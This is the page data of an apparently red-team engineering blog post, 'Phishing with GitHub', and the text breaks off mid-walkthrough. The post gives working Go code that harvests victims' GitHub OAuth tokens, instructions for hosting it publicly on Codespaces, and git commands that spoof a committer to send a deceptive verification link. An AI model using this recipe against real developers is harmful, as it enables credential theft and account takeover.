[{"data":1,"prerenderedAt":1033},["ShallowReactive",2],{"nav_featured_podcast":3,"nav_featured_press_release":21,"navigation_content":30,"engineering_blog_post:phishing-github":378},{"uid":4,"title":5,"episodeLabel":6,"dateLabel":7,"episodeArt":8,"href":20},"from-payment-rails-to-connectivity","From Payment Rails to Connectivity, with The Clearing House's David Watson","EPISODE 5","August 18, 2026",{"dimensions":9,"alt":12,"copyright":13,"url":14,"id":15,"edit":16},{"width":10,"height":11},1064,652,"Payments Cannot Fail — Episode 05 with David Watson",null,"\u002F_prismic-media\u002Fd80df2e47c3ecb6f-cFcyPAgzKCMQEaND_Episode-05-David.jpg","cFcyPAgzKCMQEaND",{"x":17,"y":17,"zoom":18,"background":19},0,1,"transparent","\u002Fresources\u002Fpodcasts\u002Ffrom-payment-rails-to-connectivity",{"uid":22,"title":23,"tag":24,"dateLabel":25,"imageUrl":26,"imageAlt":27,"href":28,"imageFit":29},"form3-expands-strategic-partnership-with-sumup","Form3 expands strategic partnership with SumUp to bring real-time SEPA payments to millions of European small businesses","EU","February 25, 2026","\u002F_prismic-media\u002F3e91177f91478610-QA44Gzev0_tdg3ZI_SumUp.jpg","sumup","\u002Fresources\u002Fpress-releases\u002Fform3-expands-strategic-partnership-with-sumup","cover",{"header":31,"platform":59,"solutions":91,"developers":133,"company":155,"resources":184,"partnerships":208,"footer":220,"mobile":325},{"ctaLabel":32,"ctaHref":33,"topNav":34},"TALK TO OUR TEAM","\u002Fcontact",[35,39,43,47,51,55],{"label":36,"href":37,"key":38},"Platform","\u002Fplatform","platform",{"label":40,"href":41,"key":42},"Solutions","\u002Fsolutions","solutions",{"label":44,"href":45,"key":46},"Developers","\u002Fdevelopers","developers",{"label":48,"href":49,"key":50},"Company","\u002Fcompany","company",{"label":52,"href":53,"key":54},"Resources","\u002Fresources","resources",{"label":56,"href":57,"key":58},"Partnerships","\u002Fpartnerships","partnerships",{"sectionEyebrow":60,"primary":61,"productLinks":65,"enterprise":81,"trustFabric":86},"Explore the Platform",{"heading":62,"body":63,"ctaLabel":64,"ctaHref":37},"Our Payments Platform","A resilient, cloud-native platform powering real-time account-to-account payments at global scale.","See How It Works",[66,69,72,75,78],{"label":67,"href":68},"Payments Processing & Gateway","\u002Fpayments-processing-gateway",{"label":70,"href":71},"Orchestration & Intelligent Routing","\u002Forchestration-intelligent-routing",{"label":73,"href":74},"Payments Simulator","\u002Fpayments-simulator",{"label":76,"href":77},"Sponsor Bank Enablement","\u002Fsponsor-bank-enablement",{"label":79,"href":80},"Informed UI","\u002Finformed-ui",{"heading":82,"body":83,"ctaLabel":84,"ctaHref":85},"Form3 Enterprise","Deploy and manage proven cloud-native payments technology in the environment that works for your institution.","Deploy Enterprise","\u002Fplatform\u002Fenterprise",{"heading":87,"body":88,"ctaLabel":89,"ctaHref":90},"Form3 Trust Fabric","Manage TLS certificates, cryptographic vulnerabilities and quantum readiness at scale, with continuous visibility.","Deploy Trust Fabric","\u002Fplatform\u002Ftrust-fabric",{"regionsIntro":92,"regions":98,"industries":118},{"eyebrow":93,"heading":94,"headingLine2":95,"body":96,"ctaLabel":64,"ctaHref":97},"Regions","Global Reach.","Regional Expertise.","A proven payments platform serving organizations worldwide, with specialized experience across North America, United Kingdom, and Europe.","\u002Fglobal",[99,108,113],{"label":100,"description":101,"ctaLabel":102,"href":103,"extraLinks":104},"North America","Real-time infrastructure, through a resilient, multi-cloud platform built for scale and regulatory confidence.","US HOME","\u002Fsolutions\u002Funited-states",[105],{"label":106,"href":107},"CANADA HOME","\u002Fsolutions\u002Fcanada",{"label":109,"description":110,"ctaLabel":111,"href":112},"United Kingdom","Powering account-to-account payments at the heart of the UK financial ecosystem, with proven resilience.","UK HOME","\u002Fsolutions\u002Funited-kingdom",{"label":114,"description":115,"ctaLabel":116,"href":117},"Europe","Enabling secure, real-time and SEPA payments across European markets through a unified, cloud-native platform.","EUROPE HOME","\u002Fsolutions\u002Feurope",{"eyebrow":119,"links":120},"Industries",[121,125,129],{"label":122,"href":123,"iconSrc":124},"Financial Services","\u002Fsolutions\u002Findustries\u002Ffinancial-services","\u002F_prismic-media\u002F29c09c45caa89db9-kbUHZmgTmuIMbo1t_FinancialServices_menu.svg",{"label":126,"href":127,"iconSrc":128},"Fintech","\u002Fsolutions\u002Findustries\u002Ffintech","\u002F_prismic-media\u002F6de3e7cb4dd8d874-SjwNe6Nh-bbuTi0P_Fintech_menu.svg",{"label":130,"href":131,"iconSrc":132},"Government","\u002Fsolutions\u002Findustries\u002Fgovernment","\u002F_prismic-media\u002Fe71bc3a74a1d2142-kaGgdituzKDnVTbm_Government_menu.svg",{"engineering":134,"api":142,"pressEyebrow":154},{"eyebrow":135,"links":136},"Engineering",[137,139],{"label":135,"href":138},"\u002Fengineering",{"label":140,"href":141},"Accreditations","\u002Faccreditations",{"eyebrow":143,"links":144},"API",[145,148,151],{"label":146,"href":147},"API Docs","https:\u002F\u002Fwww.api-docs.form3.tech\u002F",{"label":149,"href":150},"API Tutorials","https:\u002F\u002Fwww.api-docs.form3.tech\u002Fapi\u002Ftutorials\u002Fgetting-started\u002Fintroduction",{"label":152,"href":153},"API Status","https:\u002F\u002Fstatus.form3.tech\u002F","Latest Press Release",{"about":156,"people":171,"podcastEyebrow":183},{"eyebrow":157,"links":158},"About",[159,162,165,168],{"label":160,"href":161},"Our Story","\u002Fcompany\u002Four-story",{"label":163,"href":164},"Our Team","\u002Fcompany\u002Fteam",{"label":166,"href":167},"Our Success & Strategic Approach","\u002Fcompany\u002Four-success",{"label":169,"href":170},"Customer Stories","\u002Fcompany\u002Fcustomer-stories",{"eyebrow":172,"links":173},"People",[174,177,180],{"label":175,"href":176},"Careers","\u002Fcompany\u002Fcareers",{"label":178,"href":179},"Vacancies","\u002Fcompany\u002Fvacancies",{"label":181,"href":182},"Culture","\u002Fcompany\u002Fculture","Latest Podcast",{"intro":185,"links":189,"pressEyebrow":154,"podcastEyebrow":183},{"eyebrow":52,"heading":186,"body":187,"ctaLabel":188,"ctaHref":53},"Form3 Resources","Our Resources bring together thought leadership, engineering insights, payments expertise, webinars, podcasts, whitepapers, company news and stories from our teams—all in one place.","LEARN MORE",[190,193,196,199,202,205],{"label":191,"href":192},"Payments Cannot Fail Podcast","\u002Fresources\u002Fpodcasts",{"label":194,"href":195},"Press Releases","\u002Fresources\u002Fpress-releases",{"label":197,"href":198},"Payment Insights","\u002Fresources\u002Fpayment-insights",{"label":200,"href":201},"Culture Blog","\u002Fresources\u002Fculture-blog",{"label":203,"href":204},"Engineering Blog","\u002Fresources\u002Fengineering-blog",{"label":206,"href":207},"Events","\u002Fevents",{"intro":209,"links":213,"pressEyebrow":154},{"eyebrow":56,"heading":210,"body":211,"ctaLabel":212,"ctaHref":57},"Partner with Form3","Explore how Form3 works with banks, fintechs, cloud providers, technology platforms and system integrators to accelerate payment modernization, strengthen customer offerings and unlock new opportunities for growth.","Let's Partner Together",[214,217],{"label":215,"href":216},"Technical & Ecosystem Partners","\u002Fpartnerships\u002Ftechnical-ecosystem",{"label":218,"href":219},"Channel & Distribution Partners","\u002Fpartnerships\u002Fchannel-distribution",{"platform":221,"region":229,"development":240,"company":248,"resources":259,"partnerships":267,"stayConnected":272,"legalLinks":292,"certifications":314},{"title":36,"links":222},[223,224,225,226,227,228],{"label":62,"href":37},{"label":67,"href":68},{"label":70,"href":71},{"label":73,"href":74},{"label":76,"href":77},{"label":79,"href":80},{"title":230,"links":231},"Region",[232,234,236,237,238],{"label":233,"href":97},"Global",{"label":235,"href":103},"United States",{"label":109,"href":112},{"label":114,"href":117},{"label":239,"href":107},"Canada",{"title":241,"links":242},"Development",[243,244,245,246,247],{"label":135,"href":138},{"label":140,"href":141},{"label":146,"href":147},{"label":149,"href":150},{"label":152,"href":153},{"title":48,"links":249},[250,251,252,253,254,255,256],{"label":160,"href":161},{"label":163,"href":164},{"label":169,"href":170},{"label":175,"href":176},{"label":178,"href":179},{"label":181,"href":182},{"label":257,"href":258},"Net Zero","\u002Fcompany\u002Fnet-zero",{"title":52,"links":260},[261,262,263,264,265,266],{"label":186,"href":53},{"label":191,"href":192},{"label":194,"href":195},{"label":200,"href":201},{"label":203,"href":204},{"label":206,"href":207},{"title":56,"links":268},[269,270,271],{"label":210,"href":57},{"label":215,"href":216},{"label":218,"href":219},{"title":273,"body":274,"ctaLabel":32,"ctaHref":33,"social":275},"Stay Connected","Form3 is a global account-to-account financial fabric delivering a proven payments platform trusted by banks and fintechs to deliver resilient, real-time payment experiences for their customers at scale.",[276,280,284,288],{"label":277,"href":278,"icon":279},"LinkedIn","https:\u002F\u002Fwww.linkedin.com\u002Fcompany\u002Fform3-financial-cloud\u002F","linkedin",{"label":281,"href":282,"icon":283},"X","https:\u002F\u002Fwww.x.com\u002FForm3Cloud","x",{"label":285,"href":286,"icon":287},"YouTube","https:\u002F\u002Fwww.youtube.com\u002F@Form3Cloud","youtube",{"label":289,"href":290,"icon":291},"Instagram","https:\u002F\u002Fwww.instagram.com\u002Fform3.tech","instagram",[293,296,299,302,305,308,311],{"label":294,"href":295},"Terms & Conditions","\u002Flegal\u002Fterms-and-conditions",{"label":297,"href":298},"Privacy Policy","\u002Flegal\u002Fdata-privacy-statement",{"label":300,"href":301},"Recruitment Data Policy","\u002Flegal\u002Frecruitment-data-policy",{"label":303,"href":304},"Modern Slavery Statement","\u002Flegal\u002Fmodern-slavery",{"label":306,"href":307},"License","\u002Flegal\u002Flicense",{"label":309,"href":310},"Cookie Policy","\u002Flegal\u002Fcookie-policy",{"label":312,"href":313},"Manage Cookies","#cookies",[315,317,319,321,323],{"label":316},"ISO 27001",{"label":318},"ISO 27017",{"label":320},"ISO 27018",{"label":322},"ISAE 3000 SOC 2 Type II",{"label":324},"ISO 22301",{"platform":326,"solutions":341,"developers":355,"company":365,"resources":366,"partnerships":374},[327,329,339,340],{"kind":328,"label":62,"href":37},"link",{"kind":330,"label":60,"children":331},"group",[332,333,334,335,337],{"label":67,"href":68},{"label":70,"href":71},{"label":73,"href":74},{"label":76,"href":336},"\u002Fplatform\u002Fsponsor-bank-enablement",{"label":79,"href":338},"\u002Fplatform\u002Finform3d-ui",{"kind":328,"label":82,"href":85},{"kind":328,"label":87,"href":90},[342,344,350],{"kind":328,"label":233,"href":343},"\u002Fsolutions\u002Fglobal",{"kind":330,"label":93,"children":345},[346,347,348,349],{"label":235,"href":103},{"label":239,"href":107},{"label":109,"href":112},{"label":114,"href":117},{"kind":330,"label":119,"children":351},[352,353,354],{"label":122,"href":123},{"label":126,"href":127},{"label":130,"href":131},[356,360],{"kind":330,"label":135,"children":357},[358,359],{"label":135,"href":138},{"label":140,"href":141},{"kind":330,"label":143,"children":361},[362,363,364],{"label":146,"href":147},{"label":149,"href":150},{"label":152,"href":153},[],[367,368,369,370,371,372,373],{"kind":328,"label":186,"href":53},{"kind":328,"label":191,"href":192},{"kind":328,"label":194,"href":195},{"kind":328,"label":197,"href":198},{"kind":328,"label":200,"href":201},{"kind":328,"label":203,"href":204},{"kind":328,"label":206,"href":207},[375,376,377],{"kind":328,"label":210,"href":57},{"kind":328,"label":215,"href":216},{"kind":328,"label":218,"href":219},{"id":379,"uid":380,"url":381,"type":382,"href":383,"tags":384,"first_publication_date":385,"last_publication_date":386,"slugs":387,"linked_documents":389,"lang":390,"alternate_languages":391,"data":392},"alz02hEAACcAUWat","phishing-github","\u002Fresources\u002Fengineering-blog\u002Fphishing-github","engineering_blog_post","https:\u002F\u002Fform3-website.cdn.prismic.io\u002Fapi\u002Fv2\u002Fdocuments\u002Fsearch?ref=apnMZxEAACcAKWxv&q=%5B%5B%3Ad+%3D+at%28document.id%2C+%22alz02hEAACcAUWat%22%29+%5D%5D",[],"2026-07-19T16:21:58+0000","2026-08-27T02:06:59+0000",[388],"github-apps",[],"en-us",[],{"title":393,"excerpt":394,"card_image":395,"published_date":402,"reading_time":403,"tag":404,"dek":394,"featured_image":405,"about_form3":412,"client_about_heading":13,"client_about_body":413,"author_name":13,"author_title":13,"author_photo":414,"author_bio":415,"author_linkedin":416,"slices":418,"meta_title":393,"meta_description":394},"Phishing with GitHub","For a Red Team operator it can be disappointing to retire a particular technique, but it can also be an opportunity to share their knowledge with the community. Phishing operations can require a lot of time and effort to set up the infrastructure, acquiring and categorising domains, fine tuning payloads, preparing pretexts and bypassing those pesky filters and controls, but there are ways to make the process simpler. This post will explore one such method, using GitHub as a tool to distribute, host, and compromise a target in a bait, hook, and catch operation that can be done from a mobile device. This post will cover: GitHub Apps, Hosting, Distribution and SSH Access.",{"dimensions":396,"alt":393,"copyright":13,"url":398,"id":399,"edit":400},{"width":397,"height":397},800,"\u002F_prismic-media\u002F5b67acd714ef4087-n7vzFRTPfxsLJ32t_phishing-github.svg","n7vzFRTPfxsLJ32t",{"x":17,"y":17,"zoom":18,"background":401},"#ffffff","2023-02-01",5,"Blogs",{"dimensions":406,"alt":13,"copyright":13,"url":409,"id":410,"edit":411},{"width":407,"height":408},2536,2936,"\u002F_prismic-media\u002F357f1ecf54d7d933-kFgBy4kqjojl0_VT_945ad2dc-5130-47d5-8317-8689dd3.png","kFgBy4kqjojl0_VT",{"x":17,"y":17,"zoom":18,"background":19},[],[],{},[],{"link_type":417},"Any",[419,486,512,537,548,567,575,585,593,619,638,652,660,668,676,684,692,700,719,731,750,758,777,785,802,813,821,846,854,862,870,881,889,906,914,922,930,938,946,954,962,970,978,986,994],{"variation":420,"version":421,"items":422,"primary":423,"id":484,"slice_type":485,"slice_label":13},"default","initial",[],{"body":424},[425,429,433,440,443,449,452,467,473,478],{"type":426,"text":427,"spans":428},"heading2","GitHub Apps",[],{"type":430,"text":431,"spans":432},"paragraph","GitHub Apps provide a powerful way for developers to streamline and optimize their workflows. These apps function independently and can take actions through the API using their own identity, eliminating the need for maintaining a separate service account or bot user.",[],{"type":430,"text":434,"spans":435},"To create the GitHub App go to the GitHub Developer Settings page by clicking on your profile picture in the top right corner of GitHub, selecting Settings, and then selecting Developer Settings.",[436],{"start":437,"end":438,"type":439},176,194,"em",{"type":430,"text":441,"spans":442},"Select GitHub Apps from the menu on the left side of the page.",[],{"type":430,"text":444,"spans":445},"Click the New GitHub App button.",[446],{"start":447,"end":448,"type":439},10,24,{"type":430,"text":450,"spans":451},"Fill in the required information for your app, including its name, description, and the URL of your app's homepage.",[],{"type":430,"text":453,"spans":454},"Set up the permissions for your app by selecting the Account permissions options under Permissions and set the Git SSH keys access level to Read and Write.",[455,458,461,464],{"start":456,"end":457,"type":439},53,72,{"start":459,"end":460,"type":439},87,98,{"start":462,"end":463,"type":439},111,123,{"start":465,"end":466,"type":439},140,154,{"type":430,"text":468,"spans":469},"Add a callback URL by clicking on the Add Callback URL button and providing the URL to redirect to after a user authorises an installation.",[470],{"start":471,"end":472,"type":439},38,54,{"type":430,"text":474,"spans":475},"In post installation set the Setup URL where users will be redirected to this URL after installing your GitHub App to complete additional setup.",[476],{"start":477,"end":471,"type":439},29,{"type":430,"text":479,"spans":480},"Finally click on Create GitHub App to create the GitHub App.",[481],{"start":482,"end":483,"type":439},17,34,"rich_text$e942c891-b846-4b1e-aa69-dda50db36837","rich_text",{"variation":420,"version":487,"items":488,"primary":489,"id":510,"slice_type":511,"slice_label":13},"",[],{"eyebrow":13,"heading":490,"body":491,"cta_label":13,"cta_link":492,"aside_type":493,"aside_image":494,"aside_video":497,"aside_video_poster":499,"aside_video_reduced_motion":500,"aside_video_url":13,"aside_embed":501,"pardot_form_url":13,"form_submit_label":13,"form_variant":502,"form_heading":13,"redirect_on_success":503,"theme":505,"overlay_pattern":506,"background_continuation":507,"media_position":508,"aside_vertical_align":509},[],[],{"link_type":417},"Image",{"dimensions":495,"alt":13,"copyright":13,"url":409,"id":410,"edit":496},{"width":407,"height":408},{"x":17,"y":17,"zoom":18,"background":19},{"link_type":498},"Media",{},{},{},"Contact (default)",{"link_type":504},"Document","Light","None","Solid color (no gradient)","Right","Top of section","content_block$a49608e9-208b-4e05-af35-eaa9026489c0","content_block",{"variation":420,"version":421,"items":513,"primary":514,"id":536,"slice_type":485,"slice_label":13},[],{"body":515},[516,519,530],{"type":430,"text":517,"spans":518},"For the application, we will use a simple Go app that uses the OAuth2 protocol and the GitHub API to authenticate a user and retrieve their GitHub username and access token.",[],{"type":430,"text":520,"spans":521},"It defines two HTTP handlers, login and callback, the login handler redirects the user to the GitHub OAuth2 authorization URL, passing in a state and access type.",[522,525,528],{"start":523,"end":524,"type":439},30,35,{"start":526,"end":527,"type":439},40,48,{"start":472,"end":529,"type":439},59,{"type":430,"text":531,"spans":532},"The callback handler, which is called when the user is redirected back from GitHub, takes the authorisation code from the request, exchanges it for an access token, then creates a new GitHub API client using this token. It then retrieves the authenticated user's details from the API and logs their username and token to the console. Finally, it redirects the user to Github to avoid suspicions.",[533],{"start":534,"end":535,"type":439},4,12,"rich_text$926d3c95-00c0-4960-8341-16f2594de642",{"variation":420,"version":421,"items":538,"primary":539,"id":546,"slice_type":547,"slice_label":13},[],{"language_label":540,"code":541},"go",[542],{"type":543,"text":544,"spans":545},"preformatted","package main\n\nimport (\n\t\"context\"\n\t\"log\"\n\t\"net\u002Fhttp\"\n\t\"os\"\n\n\t\"github.com\u002Fgoogle\u002Fgo-github\u002Fgithub\"\n\t\"golang.org\u002Fx\u002Foauth2\"\n\tgithubOAuth2 \"golang.org\u002Fx\u002Foauth2\u002Fgithub\"\n)\n\nvar (\n\toauth2Config = &oauth2.Config{\n\t\tClientID:     os.Getenv(\"GITHUB_CLIENT_ID\"),\n\t\tClientSecret: os.Getenv(\"GITHUB_CLIENT_SECRET\"),\n\t\tEndpoint:     githubOAuth2.Endpoint,\n\t}\n\tcsrfToken = \"NotSoRandomString\"\n\tredirectURL = \"https:\u002F\u002Fgithub.com\"\n)\n\nfunc login(w http.ResponseWriter, req *http.Request) {\n\turl := oauth2Config.AuthCodeURL(csrfToken, oauth2.AccessTypeOnline)\n\thttp.Redirect(w, req, url, http.StatusTemporaryRedirect)\n}\n\nfunc callback(w http.ResponseWriter, req *http.Request) {\n\tctx := context.Background()\n\tcode := req.FormValue(\"code\")\n\ttoken, _ := oauth2Config.Exchange(ctx, code)\n\toauthClient := oauth2Config.Client(ctx, token)\n\tclient := github.NewClient(oauthClient)\n\tuser, _, _ := client.Users.Get(ctx, \"\")\n\n\tlog.Printf(\"Username: %s\", *user.Login)\n\tlog.Printf(\"Token:    %s\", token.AccessToken)\n\n\thttp.Redirect(w, req, redirectURL, http.StatusTemporaryRedirect)\n}\n\nfunc main() {\n\tconst address = \"0.0.0.0:9000\"\n\n\thttp.HandleFunc(\"\u002F\", login)\n\thttp.HandleFunc(\"\u002Fcallback\", callback)\n\n\tlog.Printf(\"Starting Server listening on http:\u002F\u002F%s\", address)\n\thttp.ListenAndServe(address, nil)\n}",[],"code_block$1561f272-30b5-43e1-a465-636b10629fb4","code_block",{"variation":420,"version":421,"items":549,"primary":550,"id":566,"slice_type":485,"slice_label":13},[],{"body":551},[552,557],{"type":430,"text":553,"spans":554},"Note: This application has been made simpler for demonstration purposes and does not include any error checking, making it unsuitable for use in a production environment.",[555],{"start":17,"end":403,"type":556},"strong",{"type":430,"text":558,"spans":559},"In order to run the application, setup the OAuth2 configuration using environment variables GITHUB_CLIENT_ID and GITHUB_CLIENT_SECRET as the client ID and client secret respectively.",[560,563],{"start":561,"end":562,"type":439},92,108,{"start":564,"end":565,"type":439},113,133,"rich_text$2f916706-80e0-4c9c-b880-b6a16be0bd52",{"variation":420,"version":421,"items":568,"primary":569,"id":574,"slice_type":547,"slice_label":13},[],{"language_label":13,"code":570},[571],{"type":543,"text":572,"spans":573},"$ export GITHUB_CLIENT_ID=Iv1.01234567890abcde\n$ export GITHUB_CLIENT_SECRET=0123456789abcdefghijklmnopqrstuvwxyz0123",[],"code_block$96d16c3d-48e1-4f3c-97e9-a188e265fa1e",{"variation":420,"version":421,"items":576,"primary":577,"id":584,"slice_type":485,"slice_label":13},[],{"body":578},[579],{"type":430,"text":580,"spans":581},"To both build and run the code, we can utilise the command go run.",[582],{"start":529,"end":583,"type":439},65,"rich_text$cac96397-82f4-413f-a1dc-03b85d2f72bb",{"variation":420,"version":421,"items":586,"primary":587,"id":592,"slice_type":547,"slice_label":13},[],{"language_label":13,"code":588},[589],{"type":543,"text":590,"spans":591},"$ go run main.go \n2023\u002F01\u002F25 17:00:54 Starting Server listening on http:\u002F\u002F0.0.0.0:9000",[],"code_block$2c366af6-551d-4cfb-b313-93085381c12c",{"variation":420,"version":421,"items":594,"primary":595,"id":618,"slice_type":485,"slice_label":13},[],{"body":596},[597,600,608,615],{"type":426,"text":598,"spans":599},"Hosting",[],{"type":430,"text":601,"spans":602},"GitHub Codespaces allows developers to easily create and manage development environments within their web browsers. It provides an integrated development environment (IDE) that includes a code editor, terminal, and debugging tools, all of which can be used to write, test, and debug code. It also allows developers to collaborate in real-time with other team members, making it a useful tool for remote teams.",[603],{"start":17,"end":482,"type":604,"data":605},"hyperlink",{"link_type":606,"url":607},"Web","https:\u002F\u002Fgithub.com\u002Ffeatures\u002Fcodespaces",{"type":430,"text":609,"spans":610},"Inspired by Nitesh Surana and Magno Logan Abusing a GitHub Codespaces Feature For Malware Delivery post we will use GitHub Codespaces to build, run and host our phishing campaign by sharing forwarded ports publicly.",[611],{"start":612,"end":460,"type":604,"data":613},42,{"link_type":606,"url":614},"https:\u002F\u002Fwww.trendmicro.com\u002Fpl_pl\u002Fresearch\u002F23\u002Fa\u002Fabusing-github-codespaces-for-malware-delivery.html",{"type":430,"text":616,"spans":617},"To accomplish this, simply run the Go application in a Codespace and set the forwarded port visibility to public.",[],"rich_text$b0aa232a-0ded-4aae-afdd-50e53931732d",{"variation":420,"version":487,"items":620,"primary":621,"id":637,"slice_type":511,"slice_label":13},[],{"eyebrow":13,"heading":622,"body":623,"cta_label":13,"cta_link":624,"aside_type":493,"aside_image":625,"aside_video":632,"aside_video_poster":633,"aside_video_reduced_motion":634,"aside_video_url":13,"aside_embed":635,"pardot_form_url":13,"form_submit_label":13,"form_variant":502,"form_heading":13,"redirect_on_success":636,"theme":505,"overlay_pattern":506,"background_continuation":507,"media_position":508,"aside_vertical_align":509},[],[],{"link_type":417},{"dimensions":626,"alt":13,"copyright":13,"url":629,"id":630,"edit":631},{"width":627,"height":628},2532,758,"\u002F_prismic-media\u002Fbd50b1accf36267d-8P0I6oKJ8VNvDqv_e8bded01-2f8e-48fe-9209-83f85db9.png","_8P0I6oKJ8VNvDqv",{"x":17,"y":17,"zoom":18,"background":19},{"link_type":498},{},{},{},{"link_type":504},"content_block$56898091-c255-4ba1-80d5-d6b40970958f",{"variation":420,"version":421,"items":639,"primary":640,"id":651,"slice_type":485,"slice_label":13},[],{"body":641},[642,645,648],{"type":426,"text":643,"spans":644},"Distribution",[],{"type":430,"text":646,"spans":647},"There are various methods for delivering payloads, but for this campaign, we will focus on using GitHub Notifications. While this technique may not be novel, it is effective in targeting developers who frequently use GitHub notifications for their daily tasks.",[],{"type":430,"text":649,"spans":650},"To execute this step, we will first create a new branch in one of the target's open-source GitHub repositories.",[],"rich_text$f5ed9de8-911f-470a-bb75-1d38565bf3aa",{"variation":420,"version":421,"items":653,"primary":654,"id":659,"slice_type":547,"slice_label":13},[],{"language_label":13,"code":655},[656],{"type":543,"text":657,"spans":658},"$ git clone https:\u002F\u002Fgithub.com\u002Ftarget\u002Fpublicproject \n$ git checkout -b security",[],"code_block$552b08b1-58f3-4b6b-b846-acd88832dc5c",{"variation":420,"version":421,"items":661,"primary":662,"id":667,"slice_type":485,"slice_label":13},[],{"body":663},[664],{"type":430,"text":665,"spans":666},"Then, we will impersonate a user from the target organisation.",[],"rich_text$6771d34f-efba-4204-ba15-6c2b5719d073",{"variation":420,"version":421,"items":669,"primary":670,"id":675,"slice_type":547,"slice_label":13},[],{"language_label":13,"code":671},[672],{"type":543,"text":673,"spans":674},"$ git config user.name \"spoofed-user\"\n$ git config user.email \"spoofed-user@target.com\"",[],"code_block$be991d7a-de95-44e5-a0c2-450019d844da",{"variation":420,"version":421,"items":677,"primary":678,"id":683,"slice_type":485,"slice_label":13},[],{"body":679},[680],{"type":430,"text":681,"spans":682},"And use the commit message to send a link to our malicious GitHub App by mentioning the target user.",[],"rich_text$4fc41ca5-7ef1-4e0c-bbb4-123de95e070e",{"variation":420,"version":421,"items":685,"primary":686,"id":691,"slice_type":547,"slice_label":13},[],{"language_label":13,"code":687},[688],{"type":543,"text":689,"spans":690},"$ git commit -a -m \"Mandatory SSH Verification\" -m \"@target-user Please verify your SSH configuration using https:\u002F\u002Fgithub.com\u002Fapps\u002Fverify-ssh.\"\n$ git push --set-upstream origin security",[],"code_block$7cc9e2a9-7f6c-40dd-90fc-9b7b419bf7f0",{"variation":420,"version":421,"items":693,"primary":694,"id":699,"slice_type":485,"slice_label":13},[],{"body":695},[696],{"type":430,"text":697,"spans":698},"The target user will receive the GitHub notification via email, on GitHub.com notifications inbox and\u002For via the GitHub Mobile client.",[],"rich_text$f36baec5-e966-42a0-be62-06d995fe93b4",{"variation":420,"version":487,"items":701,"primary":702,"id":718,"slice_type":511,"slice_label":13},[],{"eyebrow":13,"heading":703,"body":704,"cta_label":13,"cta_link":705,"aside_type":493,"aside_image":706,"aside_video":713,"aside_video_poster":714,"aside_video_reduced_motion":715,"aside_video_url":13,"aside_embed":716,"pardot_form_url":13,"form_submit_label":13,"form_variant":502,"form_heading":13,"redirect_on_success":717,"theme":505,"overlay_pattern":506,"background_continuation":507,"media_position":508,"aside_vertical_align":509},[],[],{"link_type":417},{"dimensions":707,"alt":13,"copyright":13,"url":710,"id":711,"edit":712},{"width":708,"height":709},2472,1136,"\u002F_prismic-media\u002F7a1b3bb5e9083ab7-izZcqFqu5IHXafFR_b8e75d25-11ac-4f33-94dc-36993dd.png","izZcqFqu5IHXafFR",{"x":17,"y":17,"zoom":18,"background":19},{"link_type":498},{},{},{},{"link_type":504},"content_block$d8067987-5159-4344-b102-1c1c368fcdbe",{"variation":420,"version":421,"items":720,"primary":721,"id":730,"slice_type":485,"slice_label":13},[],{"body":722},[723],{"type":430,"text":724,"spans":725},"The GitHub App is available at https:\u002F\u002Fgithub.com\u002Fapps\u002Fverify-ssh which helps to validation the pretext of the email, \"If it's in GitHub it most be legitimate!\".",[726],{"start":727,"end":583,"type":604,"data":728},31,{"link_type":606,"url":729},"https:\u002F\u002Fgithub.com\u002Fapps\u002Fverify-ssh","rich_text$f5136335-84d0-447b-b51e-084d4d6982f2",{"variation":420,"version":487,"items":732,"primary":733,"id":749,"slice_type":511,"slice_label":13},[],{"eyebrow":13,"heading":734,"body":735,"cta_label":13,"cta_link":736,"aside_type":493,"aside_image":737,"aside_video":744,"aside_video_poster":745,"aside_video_reduced_motion":746,"aside_video_url":13,"aside_embed":747,"pardot_form_url":13,"form_submit_label":13,"form_variant":502,"form_heading":13,"redirect_on_success":748,"theme":505,"overlay_pattern":506,"background_continuation":507,"media_position":508,"aside_vertical_align":509},[],[],{"link_type":417},{"dimensions":738,"alt":13,"copyright":13,"url":741,"id":742,"edit":743},{"width":739,"height":740},2374,1542,"\u002F_prismic-media\u002F2e093b3c35858ea9-U5oeRoyZSPSJhY0h_abdd04e0-0c0d-4b7b-bf87-f1b3aed.png","U5oeRoyZSPSJhY0h",{"x":17,"y":17,"zoom":18,"background":19},{"link_type":498},{},{},{},{"link_type":504},"content_block$c23f884b-f20b-4602-80df-9a9886c729c2",{"variation":420,"version":421,"items":751,"primary":752,"id":757,"slice_type":485,"slice_label":13},[],{"body":753},[754],{"type":430,"text":755,"spans":756},"Clicking the Install button takes the user to the installation page.",[],"rich_text$d315d0a9-e15a-453a-a46d-a10c477d66e4",{"variation":420,"version":487,"items":759,"primary":760,"id":776,"slice_type":511,"slice_label":13},[],{"eyebrow":13,"heading":761,"body":762,"cta_label":13,"cta_link":763,"aside_type":493,"aside_image":764,"aside_video":771,"aside_video_poster":772,"aside_video_reduced_motion":773,"aside_video_url":13,"aside_embed":774,"pardot_form_url":13,"form_submit_label":13,"form_variant":502,"form_heading":13,"redirect_on_success":775,"theme":505,"overlay_pattern":506,"background_continuation":507,"media_position":508,"aside_vertical_align":509},[],[],{"link_type":417},{"dimensions":765,"alt":13,"copyright":13,"url":768,"id":769,"edit":770},{"width":766,"height":767},2262,2340,"\u002F_prismic-media\u002F0e0b2d8b60ffa3ce-PSaBZFNQ0zSf4Nwz_e1f38263-75df-418b-8f04-504a9fe.png","PSaBZFNQ0zSf4Nwz",{"x":17,"y":17,"zoom":18,"background":19},{"link_type":498},{},{},{},{"link_type":504},"content_block$f4437740-6920-483c-878a-4aef646fc296",{"variation":420,"version":421,"items":778,"primary":779,"id":784,"slice_type":485,"slice_label":13},[],{"body":780},[781],{"type":430,"text":782,"spans":783},"Followed by the authorise page where the user authorises the permissions required for the GitHub 